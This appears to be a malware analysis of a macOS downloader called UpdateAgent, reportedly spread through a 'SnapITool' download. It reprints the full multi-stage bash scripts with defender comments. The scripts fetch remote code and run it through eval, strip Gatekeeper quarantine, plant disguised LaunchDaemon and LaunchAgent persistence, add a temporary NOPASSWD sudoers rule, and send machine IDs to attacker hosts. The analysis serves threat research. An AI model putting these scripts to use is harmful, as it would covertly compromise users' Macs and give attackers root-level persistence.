Created
June 2, 2022 19:17
UpdateAgent - GolangVersion
2aaebf0282463c60aa8866e733799eee97f41af1e3ac8ae7855279595217aa2f | |
SnapITool.zip | |
``` | |
https://vzhqu.snapitool.com/SnapITool.zip | |
``` | |
``` | |
# Stage 0, as seen in the SnapITool process tree: read the hardware UUID (IOPlatformUUID),
# which later stages send as "machine_id" with every telemetry event.
/bin/sh -c ioreg -ad2 -c IOPlatformExpertDevice | xmllint --xpath '//key[.='IOPlatformUUID']/following-sibling::*[1]/text()' - | |
# Fetch the next-stage script for this machine_id and run it directly through eval
# (nothing is written to disk at this point).  The UUID shown here looks like a
# redacted placeholder rather than a real machine id — TODO confirm.
/bin/sh -c LSPJUJGMLBTMAMMPBETB=$(curl --connect-timeout 900 -L 'https://xrcpsvz.snapitool.com/alkzsba?machine_id=11111111-2222-3333-4444-555555555555&pr=snapitool') eval '$LSPJUJGMLBTMAMMPBETB' | |
``` | |
Downloaded code: | |
``` | |
#!/bin/bash | |
# Stage-1 installer.  It has to be running as root: it writes a plist into
# /Library/LaunchDaemons and a folder under /Library/Application Support.
# Every step below POSTs a success or failure event (with the machine UUID,
# OS name and OS version) to eventsURL, then continues regardless of outcome.
# Defender notes, all visible in this script: curl writing into
# "/Library/Application Support", removal of com.apple.quarantine, a new
# LaunchDaemon plist, and JSON POSTs to the cloudfront host below.
# Event names, one success/failure pair per install step.
eventsNameStep1="system_intermediate_agent_step_1" | |
eventsNameStep1Fail="system_intermediate_agent_step_1_fail" | |
eventsNameStep2="system_intermediate_agent_step_2" | |
eventsNameStep2Fail="system_intermediate_agent_step_2_fail" | |
eventsNameStep3="system_intermediate_agent_step_3" | |
eventsNameStep3Fail="system_intermediate_agent_step_3_fail" | |
eventsNameStep4="system_intermediate_agent_step_4" | |
eventsNameStep4Fail="system_intermediate_agent_step_4_fail" | |
eventsNameStep5="system_intermediate_agent_step_5" | |
eventsNameStep5Fail="system_intermediate_agent_step_5_fail" | |
eventsNameStep6="system_intermediate_agent_step_6" | |
eventsNameStep6Fail="system_intermediate_agent_step_6_fail" | |
eventsNameStep7="system_intermediate_agent_step_7" | |
eventsNameStep7Fail="system_intermediate_agent_step_7_fail" | |
# Telemetry collector endpoint.
eventsURL="https://d2u7maudpwyo3n.cloudfront.net/pkg" | |
# On-disk names chosen to look like system components.
productName="com.buffer.system" | |
productFolder="System" | |
productTempFolder="jugcoojzoapcetvbktvt" | |
tempFolder="/tmp/$productTempFolder" | |
SOFTWAREUPDATEAGENT="SystemBuffer" | |
# OS fingerprint and hardware UUID included in every telemetry event.
MACPLATFORM=`sw_vers -productName` | |
MACVERSION=`sw_vers -productVersion` | |
machineID="$(ioreg -ad2 -c IOPlatformExpertDevice | xmllint --xpath '//key[.="IOPlatformUUID"]/following-sibling::*[1]/text()' -)" | |
# Resolved here but never referenced again in this script.
userDirectory=$(eval echo ~$(echo $USER)) | |
# Persistence target: a system-wide LaunchDaemon (root-only location).
plistLA="/Library/LaunchDaemons/$productName.plist" | |
# Drop folder for the agent, next to legitimate application data.
libraryDir="/Library/Application Support/$productFolder" | |
mkdir -p "$libraryDir" | |
# Step 1: fetch the agent archive into the drop folder.
curl --retry 5 -f "https://shhxpxrfcuocurentw.s3.amazonaws.com/$SOFTWAREUPDATEAGENT.zip" -o "$libraryDir/$SOFTWAREUPDATEAGENT.zip" | |
if [ $? -eq 0 ]; then | |
# The telemetry request is assembled as a string and run through eval.
CONTESTEP1="{\"event\": \"$eventsNameStep1\", \"machine_id\": \"$machineID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}" | |
REQSTEP1="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTESTEP1' $eventsURL" | |
eval $REQSTEP1 | |
if [ ! 0 -eq $? ]; then | |
echo "Failed" | |
fi | |
else | |
CONTESTEP1FAIL="{\"event\": \"$eventsNameStep1Fail\", \"machine_id\": \"$machineID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}" | |
REQSTEP1FAIL="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTESTEP1FAIL' $eventsURL" | |
eval $REQSTEP1FAIL | |
if [ ! 0 -eq $? ]; then | |
echo "Failed" | |
fi | |
fi | |
# Remove the quarantine attribute (so Gatekeeper does not intervene), make the
# archive world-writable, unpack it, and do the same for the extracted binary.
# Note the install continues here even if the download in step 1 failed.
xattr -r -d com.apple.quarantine "$libraryDir/$SOFTWAREUPDATEAGENT.zip" | |
chmod -R 777 "$libraryDir/$SOFTWAREUPDATEAGENT.zip" | |
ditto -x -k "$libraryDir/$SOFTWAREUPDATEAGENT.zip" "$libraryDir" | |
xattr -r -d com.apple.quarantine "$libraryDir/$SOFTWAREUPDATEAGENT" | |
chmod -R 777 "$libraryDir/$SOFTWAREUPDATEAGENT" | |
# Step 2: stage the plist in a temp folder with a random-looking name.
mkdir -p "$tempFolder" | |
touch "$tempFolder/$productName.plist" | |
if [ $? -eq 0 ]; then | |
CONTESTEP2="{\"event\": \"$eventsNameStep2\", \"machine_id\": \"$machineID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}" | |
REQSTEP2="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTESTEP2' $eventsURL" | |
eval $REQSTEP2 | |
if [ ! 0 -eq $? ]; then | |
echo "Failed" | |
fi | |
else | |
CONTESTEP2FAIL="{\"event\": \"$eventsNameStep2Fail\", \"machine_id\": \"$machineID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}" | |
REQSTEP2FAIL="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTESTEP2FAIL' $eventsURL" | |
eval $REQSTEP2FAIL | |
if [ ! 0 -eq $? ]; then | |
echo "Failed" | |
fi | |
fi | |
# Step 3: write the LaunchDaemon definition.  RunAtLoad starts the agent when
# the daemon is loaded (and at boot); StartInterval re-runs it every 3600 s.
echo "<?xml version=\"1.0\" encoding=\"UTF-8\"?> | |
<!DOCTYPE plist PUBLIC \"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\"> | |
<plist version=\"1.0\"> | |
<dict> | |
<key>Label</key> | |
<string>$productName</string> | |
<key>Program</key> | |
<string>$libraryDir/$SOFTWAREUPDATEAGENT</string> | |
<key>RunAtLoad</key> | |
<true /> | |
<key>StartInterval</key> | |
<integer>3600</integer> | |
</dict> | |
</plist> | |
" > "$tempFolder/$productName.plist" | |
if [ $? -eq 0 ]; then | |
CONTESTEP3="{\"event\": \"$eventsNameStep3\", \"machine_id\": \"$machineID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}" | |
REQSTEP3="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTESTEP3' $eventsURL" | |
eval $REQSTEP3 | |
if [ ! 0 -eq $? ]; then | |
echo "Failed" | |
fi | |
else | |
CONTESTEP3FAIL="{\"event\": \"$eventsNameStep3Fail\", \"machine_id\": \"$machineID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}" | |
REQSTEP3FAIL="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTESTEP3FAIL' $eventsURL" | |
eval $REQSTEP3FAIL | |
if [ ! 0 -eq $? ]; then | |
echo "Failed" | |
fi | |
fi | |
# Step 4: world-writable staged plist (undone again in step 6).
chmod -R 777 "$tempFolder/$productName.plist" | |
if [ $? -eq 0 ]; then | |
CONTESTEP4="{\"event\": \"$eventsNameStep4\", \"machine_id\": \"$machineID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}" | |
REQSTEP4="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTESTEP4' $eventsURL" | |
eval $REQSTEP4 | |
if [ ! 0 -eq $? ]; then | |
echo "Failed" | |
fi | |
else | |
CONTESTEP4FAIL="{\"event\": \"$eventsNameStep4Fail\", \"machine_id\": \"$machineID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}" | |
REQSTEP4FAIL="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTESTEP4FAIL' $eventsURL" | |
eval $REQSTEP4FAIL | |
if [ ! 0 -eq $? ]; then | |
echo "Failed" | |
fi | |
fi | |
# Step 5: install the plist into /Library/LaunchDaemons (the persistence artefact).
cp -f "$tempFolder/$productName.plist" "$plistLA" | |
if [ $? -eq 0 ]; then | |
CONTESTEP5="{\"event\": \"$eventsNameStep5\", \"machine_id\": \"$machineID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}" | |
REQSTEP5="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTESTEP5' $eventsURL" | |
eval $REQSTEP5 | |
if [ ! 0 -eq $? ]; then | |
echo "Failed" | |
fi | |
else | |
CONTESTEP5FAIL="{\"event\": \"$eventsNameStep5Fail\", \"machine_id\": \"$machineID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}" | |
REQSTEP5FAIL="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTESTEP5FAIL' $eventsURL" | |
eval $REQSTEP5FAIL | |
if [ ! 0 -eq $? ]; then | |
echo "Failed" | |
fi | |
fi | |
# Step 6: tighten the installed plist to 0644 — presumably so launchd accepts it.
chmod -R 644 "$plistLA" | |
if [ $? -eq 0 ]; then | |
CONTESTEP6="{\"event\": \"$eventsNameStep6\", \"machine_id\": \"$machineID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}" | |
REQSTEP6="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTESTEP6' $eventsURL" | |
eval $REQSTEP6 | |
if [ ! 0 -eq $? ]; then | |
echo "Failed" | |
fi | |
else | |
CONTESTEP6FAIL="{\"event\": \"$eventsNameStep6Fail\", \"machine_id\": \"$machineID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}" | |
REQSTEP6FAIL="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTESTEP6FAIL' $eventsURL" | |
eval $REQSTEP6FAIL | |
if [ ! 0 -eq $? ]; then | |
echo "Failed" | |
fi | |
fi | |
# Step 7: load and enable (-w) the daemon; the agent runs from here on.
launchctl load -w "$plistLA" | |
if [ $? -eq 0 ]; then | |
CONTESTEP7="{\"event\": \"$eventsNameStep7\", \"machine_id\": \"$machineID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}" | |
REQSTEP7="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTESTEP7' $eventsURL" | |
eval $REQSTEP7 | |
if [ ! 0 -eq $? ]; then | |
echo "Failed" | |
fi | |
else | |
CONTESTEP7FAIL="{\"event\": \"$eventsNameStep7Fail\", \"machine_id\": \"$machineID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}" | |
REQSTEP7FAIL="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTESTEP7FAIL' $eventsURL" | |
eval $REQSTEP7FAIL | |
if [ ! 0 -eq $? ]; then | |
echo "Failed" | |
fi | |
fi | |
# Cleanup: the staging folder and the archive are removed; the extracted
# binary and the LaunchDaemon plist stay behind.
rm -rf "$tempFolder" | |
rm "$libraryDir/$SOFTWAREUPDATEAGENT.zip" | |
``` | |
The downloaded agent is also a Go Mach-O binary, fetched from:
``` | |
shhxpxrfcuocurentw.s3.amazonaws.com/SystemBuffer.zip | |
``` | |
1b0d39cffd387f818747bb2b2d30aacb0cbd0901713b02b5e86300ce98bbe570 SystemBuffer.zip | |
6f675c247f2fb4350633f2f0c537fdc99bce92bbfaae184e2d79b68c1eeb2ad0 SystemBuffer | |
This binary then connects out and downloads another bash script to execute:
``` | |
curl --connect-timeout 900 -L "https://vrdazgynlt.comsysbuf.com/lklgxnagyx?maid={ID} | |
``` | |
The URL portion is bugged: it contains an error message, similar to the one described in the Jamf blog.
``` | |
#!/bin/bash | |
# Stage-2 script, fetched by the SystemBuffer agent.  It runs as root (it appends
# to /etc/sudoers) but performs most actions as the logged-in console user via
# sudo -u, and installs a per-user LaunchAgent that runs a downloaded app once.
# Defender notes, all visible below: an append to /etc/sudoers without visudo, a
# LaunchAgent whose program is "/bin/bash -c ...", xattr -rc on a fresh .dmg, and
# JSON POSTs to the events host.
# Event names reported to the telemetry endpoint.
EVENTSHEARTBEAT="optimizer_intermediate_agent_heartbeat" | |
EVENTSSTARTING="optimizer_intermediate_agent_started" | |
EVENTSDLWFileSuccess="optimizer_intermediate_agent_dlw_1_file_success" | |
EVENTSDLWFileError="optimizer_intermediate_agent_dlw_1_file_error" | |
EVENTSRunningFileSuccess="optimizer_intermediate_agent_running_1_success" | |
EVENTSRunningFileError="optimizer_intermediate_agent_running_1_error" | |
EVENTSUserExists="optimizer_intermediate_agent_already_exists" | |
EVENTSURL="https://events.optimizerservices.com/pkg" | |
PRODUCTFOLDER="lmeeznlggvhxsvttiwhtizyleqjdlc" | |
# The owner of /dev/console is the user currently logged in at the GUI.
user=$(ls -l /dev/console | awk '/ / { print $3 }') | |
userHome=$(eval echo ~$(echo $user)) | |
MACHINEID="$(ioreg -ad2 -c IOPlatformExpertDevice | xmllint --xpath '//key[.="IOPlatformUUID"]/following-sibling::*[1]/text()' -)" | |
# Hidden marker files used below as "already installed" checks.  Nothing in this
# script creates them; presumably the dropped app does — TODO confirm.
AG_1="$userHome/Library/.pixl" | |
AG_2="$userHome/Library/Application Support/.logg" | |
MACPLATFORM=`sw_vers -productName` | |
MACVERSION=`sw_vers -productVersion` | |
# Heartbeat: string-built curl run through eval, same pattern as the stage-1 installer.
CONTHEARTBEAT="{\"event\": \"$EVENTSHEARTBEAT\", \"machine_id\": \"$MACHINEID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}" | |
REQHEARTBEAT="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTHEARTBEAT' $EVENTSURL" | |
eval $REQHEARTBEAT | |
# Volume name expected for the mounted .dmg; switched to "Install" below if present.
PATHNAME="setup" | |
# Only proceed when neither marker exists and a real user (not root or
# _windowserver, i.e. no one logged in) owns the console.
if [ ! -f "$AG_1" ]; then | |
if [ ! -f "$AG_2" ]; then | |
if [[ "$user" != "root" && "$user" != "_windowserver" ]]; then | |
CONTEVENTSSTARTING="{\"event\": \"$EVENTSSTARTING\", \"machine_id\": \"$MACHINEID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}" | |
REQEVENTSSTARTING="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTEVENTSSTARTING' $EVENTSURL" | |
eval $REQEVENTSSTARTING | |
userId=$(id -u $user) | |
# Temp file that will hold the one-line launcher command; created as the user.
TMPFILE=$(sudo -u $user mktemp /tmp/XXXXXXXXXXXX) | |
SERVICE_NAME="com.$PRODUCTFOLDER" | |
LAUNCH_AGENTS_PATH="$userHome/Library/LaunchAgents/" | |
PLIST_PATH="$LAUNCH_AGENTS_PATH$SERVICE_NAME.plist" | |
# In the original this held the .dmg download URL.  The captured copy contains a
# 404 HTML page instead (the payload URL had already been pulled), and the inner
# double quotes are not escaped, so this assignment is unlikely to parse as written.
URL="<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "https://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> | |
<html xmlns="https://www.w3.org/1999/xhtml"> | |
<head> | |
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> | |
<title>404 - File or directory not found.</title> | |
<style type="text/css"> | |
<!-- | |
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} | |
fieldset{padding:0 15px 10px 15px;} | |
h1{font-size:2.4em;margin:0;color:#FFF;} | |
h2{font-size:1.7em;margin:0;color:#CC0000;} | |
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} | |
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; | |
background-color:#555555;} | |
#content{margin:0 0 0 2%;position:relative;} | |
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} | |
--> | |
</style> | |
</head> | |
<body> | |
<div id="header"><h1>Server Error</h1></div> | |
<div id="content"> | |
<div class="content-container"><fieldset> | |
<h2>404 - File or directory not found.</h2> | |
<h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> | |
</fieldset></div> | |
</div> | |
</body> | |
</html> | |
" | |
# Command the LaunchAgent will run as the user: execute the temp launcher as
# root via sudo, delete it, then unload the agent itself.
SCRIPT="sudo $TMPFILE pkgsh && rm $TMPFILE && /bin/launchctl bootout gui/$userId/$SERVICE_NAME" | |
# Temporary NOPASSWD sudoers rule so the user-context agent can run the launcher
# as root.  Appended directly, without visudo, and removed again further down.
echo "$user ALL = NOPASSWD: $TMPFILE pkgsh" >> "/etc/sudoers" | |
sudo -u $user mkdir "$LAUNCH_AGENTS_PATH" | |
# Replace any earlier instance of the agent.
if [ -f "$PLIST_PATH" ]; then | |
/bin/launchctl bootout gui/$userId/$SERVICE_NAME | |
rm $PLIST_PATH | |
fi | |
# Download the disk image as the user.  Note the script carries on into the
# mount/copy steps even when this download fails (only the event differs).
sudo -u $user /usr/bin/curl -L -o "/tmp/setup.dmg" $URL | |
if [ $? -eq 0 ]; then | |
CONTEUNZIPFILESUCCESS="{\"event\": \"$EVENTSDLWFileSuccess\", \"machine_id\": \"$MACHINEID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}" | |
REQEUNZIPZIPFILESUCCESS="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTEUNZIPFILESUCCESS' $EVENTSURL" | |
eval $REQEUNZIPZIPFILESUCCESS | |
else | |
CONTEUNZIPFILEERROR="{\"event\": \"$EVENTSDLWFileError\", \"machine_id\": \"$MACHINEID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}" | |
REQEUNZIPFILEERROR="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTEUNZIPFILEERROR' $EVENTSURL" | |
eval $REQEUNZIPFILEERROR | |
fi | |
# Clear all extended attributes (including quarantine) and mount the image.
sudo -u $user /usr/bin/xattr -rc "/tmp/setup.dmg" | |
sudo -u $user /usr/bin/hdiutil attach "/tmp/setup.dmg" | |
if [ -d "/Volumes/Install" ]; then | |
PATHNAME="Install" | |
fi | |
# Pick the .app bundle from the mounted volume, copy it to /tmp and open it up.
CONTENT_VOLUME=$(ls /Volumes/$PATHNAME | awk '/.app/') | |
sudo -u $user cp -rf "/Volumes/$PATHNAME/$CONTENT_VOLUME" "/tmp" | |
sleep 2 | |
sudo -u $user chmod -R 777 "/tmp/$CONTENT_VOLUME" | |
# The launcher runs the first executable in the bundle's Contents/MacOS with a
# "-shh" argument (its meaning is not visible from this script).
sudo -u $user /bin/echo "/tmp/./$CONTENT_VOLUME/Contents/MacOS/$(ls /tmp/$CONTENT_VOLUME/Contents/MacOS | head -n1) -shh" >> $TMPFILE | |
sudo -u $user chmod 777 $TMPFILE | |
# Build the LaunchAgent with PlistBuddy: ProgramArguments = /bin/bash -c "$SCRIPT",
# RunAtLoad so it fires as soon as it is bootstrapped.
sudo -u $user /usr/libexec/PlistBuddy -c "Add :Label string $SERVICE_NAME" "$PLIST_PATH" | |
sudo -u $user /usr/libexec/PlistBuddy -c 'Add :ProgramArguments array' "$PLIST_PATH" | |
sudo -u $user /usr/libexec/PlistBuddy -c "Add :ProgramArguments: string /bin/bash" "$PLIST_PATH" | |
sudo -u $user /usr/libexec/PlistBuddy -c "Add :ProgramArguments: string -c" "$PLIST_PATH" | |
sudo -u $user /usr/libexec/PlistBuddy -c "Add :ProgramArguments: string $SCRIPT" "$PLIST_PATH" | |
sudo -u $user /usr/libexec/PlistBuddy -c 'Add :RunAtLoad bool true' "$PLIST_PATH" | |
# Load the agent into the user's GUI session; with RunAtLoad this executes SCRIPT now.
/bin/launchctl bootstrap gui/$userId "$PLIST_PATH" | |
if [ $? -eq 0 ]; then | |
CONTERUNNINGFILESUCCESS="{\"event\": \"$EVENTSRunningFileSuccess\", \"machine_id\": \"$MACHINEID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}" | |
REQERUNNINGZIPFILESUCCESS="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTERUNNINGFILESUCCESS' $EVENTSURL" | |
eval $REQERUNNINGZIPFILESUCCESS | |
else | |
CONTERUNNINGFILEERROR="{\"event\": \"$EVENTSRunningFileError\", \"machine_id\": \"$MACHINEID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}" | |
REQERUNNINGFILEERROR="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTERUNNINGFILEERROR' $EVENTSURL" | |
eval $REQERUNNINGFILEERROR | |
fi | |
# Cleanup after a fixed delay.  The sudoers edit deletes whatever the last line
# is, assuming the rule appended above is still last; the plist and .dmg are
# removed so little persists on disk.  hdiutil detach is given the bare volume
# name rather than the mount point, so it likely fails.
sleep 10 | |
sed -i '' -e '$ d' /etc/sudoers | |
rm $PLIST_PATH | |
rm "/tmp/setup.dmg" | |
hdiutil detach "$PATHNAME" | |
fi | |
else | |
# Marker AG_2 present: report "already exists" and do nothing else.
CONTUSERALREADYUPDATED="{\"event\": \"$EVENTSUserExists\", \"machine_id\": \"$MACHINEID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}" | |
REQUSERALREADYUPDATED="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTUSERALREADYUPDATED' $EVENTSURL" | |
eval $REQUSERALREADYUPDATED | |
fi | |
else | |
# Marker AG_1 present: same "already exists" report.
CONTUSERALREADYUPDATED="{\"event\": \"$EVENTSUserExists\", \"machine_id\": \"$MACHINEID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}" | |
REQUSERALREADYUPDATED="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTUSERALREADYUPDATED' $EVENTSURL" | |
eval $REQUSERALREADYUPDATED | |
fi | |
``` | |